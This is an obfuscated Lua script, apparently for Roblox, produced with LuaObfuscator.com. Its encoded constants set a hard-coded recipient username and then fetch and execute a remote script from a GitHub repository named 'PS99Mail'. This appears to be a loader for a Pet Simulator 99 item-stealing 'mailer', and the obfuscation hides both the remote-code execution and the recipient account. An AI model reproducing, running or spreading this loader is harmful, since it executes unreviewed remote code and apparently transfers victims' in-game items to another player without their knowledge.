--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v84=0;while true do if (v84==0) then v19=v0(v3(v30,1,1));return "";end end else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v30,16));if v19 then local v100=0;local v101;while true do if (v100==1) then return v101;end if (v100==0) then v101=v5(v86,v19);v19=nil;v100=1;end end else return v86;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v87=0 -0 ;local v88;while true do if (v87==(0 -0)) then v88=(v31/((3 -1)^(v32-(1638 -(1523 + 114)))))%((4 -2)^(((v33-(620 -(499 + 56 + 64))) -(v32-(932 -(857 + 74)))) + (569 -((523 -156) + 201)))) ;return v88-(v88%(928 -(214 + 713))) ;end end else local v89=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v89 + v89))>=v89) and 1) or (877 -(282 + 595)) ;end end local function v21()local v34=(1044 + 21) -(68 + 997) ;local v35;while true do if (v34==(1271 -(226 + 1044))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + 85)) ;v34=1;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v37 * 256) + v36 ;end local function v23()local v38=0 -(0 -0) ;local v39;local v40;local v41;local v42;while true do if (v38==((1 -0) -0)) then return (v42 * (12338840 + 4438376)) + (v41 * (120312 -54776)) + (v40 * 256) + v39 ;end if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + (1001 -(915 + 82)) ;v38=181 -(67 + 113) ;end end end local function v24()local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if ((2 + 0)==v43) then v48=v20(v45,21,(24 + 16) -9 );v49=((v20(v45,1219 -(1069 + 118) )==(2 -1)) and  -((3 -2) -0)) or (1 + 0) ;v43=3;end if (v43==(1 -0)) then v46=1 + (0 -0) ;v47=(v20(v45,792 -(368 + 423) ,20) * (2^(100 -68))) + v44 ;v43=2;end if (v43==(21 -(10 + 8))) then if (v48==0) then if (v47==(0 -0)) then return v49 * 0 ;else local v102=0;while true do if (v102==(442 -(416 + (885 -(814 + 45))))) then v48=3 -(4 -2) ;v46=0 + 0 ;break;end end end elseif (v48==(3621 -1574)) then return ((v47==(438 -(145 + 293))) and (v49 * ((431 -(44 + 386))/(1486 -(998 + 488))))) or (v49 * NaN) ;end return v8(v49,v48-(325 + 698) ) * (v46 + (v47/((2 + 0)^(824 -(11 + 190 + 571))))) ;end if (v43==(1138 -(116 + 1022))) then v44=v23();v45=v23();v43=4 -3 ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(0 + 0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(886 -(261 + 624)) );v18=v18 + v50 ;local v52={};for v68=1 -0 , #v51 do v52[v68]=v2(v1(v3(v51,v68,v68)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53~=(1 + 0)) then else v56=nil;v57=nil;v53=2 -0 ;end if (v53==4) then while true do if (v54~=0) then else local v97=0 + 0 ;while true do if (v97~=(561 -(306 + 254))) then else v54=1 + 0 ;break;end if (v97==(0 -0)) then v55=0;v56=nil;v97=1468 -(899 + 568) ;end end end if (v54==1) then local v98=0 + 0 ;while true do if (v98==0) then v57=nil;v58=nil;v98=1;end if (v98==1) then v54=4 -2 ;break;end end end if (v54~=3) then else v61=nil;while true do local v103=603 -(268 + 335) ;local v104;while true do if (v103==(290 -(60 + 230))) then v104=572 -(426 + 146) ;while true do if (v104~=1) then else if (v55==(1 + 2)) then local v153=1456 -(282 + 1174) ;local v154;local v155;while true do if ((812 -(569 + 242))~=v153) then else while true do if (v154~=(0 -0)) then else v155=0 + 0 ;while true do if (0==v155) then local v169=0;while true do if (v169==(1024 -(706 + 318))) then local v177=1251 -(721 + 530) ;while true do if (v177~=0) then else for v184=1272 -(945 + 326) ,v23() do v57[v184-1 ]=v28();end return v59;end end end end end end break;end end break;end if (v153~=0) then else v154=0 -0 ;v155=nil;v153=1;end end end if (v55~=(2 + 0)) then else local v156=0;local v157;while true do if (v156~=(700 -(271 + 429))) then else v157=0;while true do if (v157~=(1 + 0)) then else for v165=1,v23() do local v166=1500 -(1408 + 92) ;local v167;local v168;while true do if (v166==(1086 -(461 + 625))) then v167=1288 -(993 + 295) ;v168=nil;v166=1;end if (v166~=(1 + 0)) then else while true do if (v167==0) then v168=v21();if (v20(v168,1,1172 -(418 + 753) )~=(0 + 0)) then else local v178=0;local v179;local v180;local v181;local v182;local v183;while true do if (v178==(1 + 0)) then v181=nil;v182=nil;v178=2;end if (v178==(1 + 1)) then v183=nil;while true do if ((1 + 1)~=v179) then else while true do if (v180==1) then local v192=0;local v193;while true do if ((529 -(406 + 123))~=v192) then else v193=1769 -(1749 + 20) ;while true do if (v193==(1 + 0)) then v180=2;break;end if (v193==0) then local v202=0;while true do if (v202==0) then local v204=1322 -(1249 + 73) ;while true do if (v204==0) then v183={v22(),v22(),nil,nil};if (v181==(1900 -(106 + 1794))) then local v210=0;local v211;while true do if (v210==0) then v211=0 + 0 ;while true do if (v211==0) then v183[1 + 2 ]=v22();v183[11 -7 ]=v22();break;end end break;end end elseif (v181==(2 -1)) then v183[117 -(4 + 110) ]=v23();elseif (v181==(586 -(57 + 527))) then v183[1430 -(41 + 1386) ]=v23() -((105 -(17 + 86))^16) ;elseif (v181~=(3 + 0)) then else local v216=0 -0 ;while true do if (v216~=0) then else v183[8 -5 ]=v23() -((168 -(122 + 44))^16) ;v183[6 -2 ]=v22();break;end end end v204=1;end if (v204~=(3 -2)) then else v202=1 + 0 ;break;end end end if (v202==(1 + 0)) then v193=1 -0 ;break;end end end end break;end end end if (v180==2) then local v194=65 -(30 + 35) ;local v195;while true do if (v194==(0 + 0)) then v195=0;while true do if (v195==(1258 -(1043 + 214))) then v180=3;break;end if (v195~=0) then else local v203=0 -0 ;while true do if (v203~=(1213 -(323 + 889))) then else v195=2 -1 ;break;end if (v203==0) then if (v20(v182,1,581 -(361 + 219) )==(321 -(53 + 267))) then v183[2]=v61[v183[2]];end if (v20(v182,2,2)==(1 + 0)) then v183[416 -(15 + 398) ]=v61[v183[3]];end v203=1;end end end end break;end end end if (v180==3) then if (v20(v182,985 -(18 + 964) ,11 -8 )==1) then v183[3 + 1 ]=v61[v183[4]];end v56[v165]=v183;break;end if (v180==(0 + 0)) then local v197=0;local v198;local v199;while true do if (v197~=1) then else while true do if (v198~=(850 -(20 + 830))) then else v199=0 + 0 ;while true do if (v199==(126 -(116 + 10))) then local v205=0;while true do if (v205==(1 + 0)) then v199=1;break;end if (v205~=0) then else v181=v20(v168,740 -(542 + 196) ,3);v182=v20(v168,4,12 -6 );v205=1;end end end if (v199~=1) then else v180=1 + 0 ;break;end end break;end end break;end if (0==v197) then v198=0 + 0 ;v199=nil;v197=1 + 0 ;end end end end break;end if (v179==(2 -1)) then local v189=0 -0 ;while true do if (v189~=(1552 -(1126 + 425))) then else v179=407 -(118 + 287) ;break;end if (v189~=(0 -0)) then else v182=nil;v183=nil;v189=1122 -(118 + 1003) ;end end end if (v179==0) then local v190=0 -0 ;while true do if (v190==(378 -(142 + 235))) then v179=1;break;end if (v190==(0 -0)) then v180=0;v181=nil;v190=1;end end end end break;end if (0==v178) then v179=0 + 0 ;v180=nil;v178=978 -(553 + 424) ;end end end break;end end break;end end end v55=3;break;end if (v157~=(0 -0)) then else local v163=0 + 0 ;while true do if (v163==(0 + 0)) then for v172=1,v60 do local v173=0;local v174;local v175;local v176;while true do if ((0 + 0)==v173) then v174=0;v175=nil;v173=1;end if (v173==1) then v176=nil;while true do if ((1 + 0)==v174) then if (v175==1) then v176=v21()~=(0 + 0) ;elseif (v175==2) then v176=v24();elseif (v175==3) then v176=v25();end v61[v172]=v176;break;end if (v174==(0 -0)) then local v187=0;local v188;while true do if (v187~=0) then else v188=0 -0 ;while true do if (v188==(0 -0)) then local v191=0 + 0 ;while true do if (1~=v191) then else v188=4 -3 ;break;end if (0==v191) then v175=v21();v176=nil;v191=754 -(239 + 514) ;end end end if (v188==1) then v174=1 + 0 ;break;end end break;end end end end break;end end end v59[1332 -(797 + 532) ]=v21();v163=1;end if ((1 + 0)~=v163) then else v157=1 + 0 ;break;end end end end break;end end end break;end if (v104==0) then if (v55==(0 -0)) then local v158=0;local v159;while true do if (v158~=0) then else v159=0;while true do if (v159==0) then local v164=0;while true do if (v164==(1202 -(373 + 829))) then v56={};v57={};v164=732 -(476 + 255) ;end if (v164==(1131 -(369 + 761))) then v159=1;break;end end end if (v159==(1 + 0)) then v58={};v55=1;break;end end break;end end end if (v55==(1 -0)) then local v160=0 -0 ;local v161;local v162;while true do if (v160==1) then while true do if (v161~=(238 -(64 + 174))) then else v162=0 + 0 ;while true do if (v162~=0) then else local v171=0;while true do if (v171~=(0 -0)) then else v59={v56,v57,nil,v58};v60=v23();v171=1;end if (v171==1) then v162=1;break;end end end if (v162==1) then v61={};v55=2;break;end end break;end end break;end if (v160==(0 + 0)) then v161=0;v162=nil;v160=1 + 0 ;end end end v104=1505 -(363 + 1141) ;end end break;end end end break;end if (v54==2) then local v99=0;while true do if ((1581 -(1183 + 397))==v99) then v54=8 -5 ;break;end if ((0 + 0)==v99) then v59=nil;v60=nil;v99=1;end end end end break;end if (v53~=3) then else v60=nil;v61=nil;v53=4;end if (v53==(0 + 0)) then v54=0;v55=nil;v53=1;end if (v53==2) then v58=nil;v59=nil;v53=3;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v90=0,v78 do if (v90>=v72) then v76[v90-v72 ]=v77[v90 + 1 ];else v80[v90]=v77[v90 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=4) then if (v83<=1) then if (v83==0) then local v105=v82[2];local v106=v80[v82[3]];v80[v105 + 1 ]=v106;v80[v105]=v106[v82[4]];else v80[v82[2]]();end elseif (v83<=2) then do return;end elseif (v83>3) then v80[v82[2]]=v82[3];else v64[v82[3]]=v80[v82[2]];end elseif (v83<=7) then if (v83<=5) then local v110;local v111,v112;local v113;local v114;v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end v74=v74 + 1 ;v82=v70[v74];v114=v82[2];v113=v80[v82[3]];v80[v114 + 1 ]=v113;v80[v114]=v113[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v114=v82[2];v111,v112=v73(v80[v114](v13(v80,v114 + 1 ,v82[3])));v75=(v112 + v114) -1 ;v110=0;for v129=v114,v75 do v110=v110 + 1 ;v80[v129]=v111[v110];end v74=v74 + 1 ;v82=v70[v74];v114=v82[2];v80[v114]=v80[v114](v13(v80,v114 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];v74=v82[3];elseif (v83==6) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end else v74=v82[3];end elseif (v83<=8) then local v124=0;local v125;local v126;local v127;local v128;while true do if (v124==0) then v125=v82[2];v126,v127=v73(v80[v125](v13(v80,v125 + 1 ,v82[3])));v124=1;end if (v124==1) then v75=(v127 + v125) -1 ;v128=0;v124=2;end if (v124==2) then for v147=v125,v75 do v128=v128 + 1 ;v80[v147]=v126[v128];end break;end end elseif (v83==9) then if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v64;else v80[v82[2]]=v64[v82[3]];end else local v143=v82[2];v80[v143]=v80[v143](v13(v80,v143 + 1 ,v75));end v74=v74 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030C3O005773756D6965746F6E776D31030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000F3O0012043O00013O0026063O0001000100010004073O00010001001204000100033O001205000100023O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O000E00010004073O000100012O00023O00017O00",v9(),...);
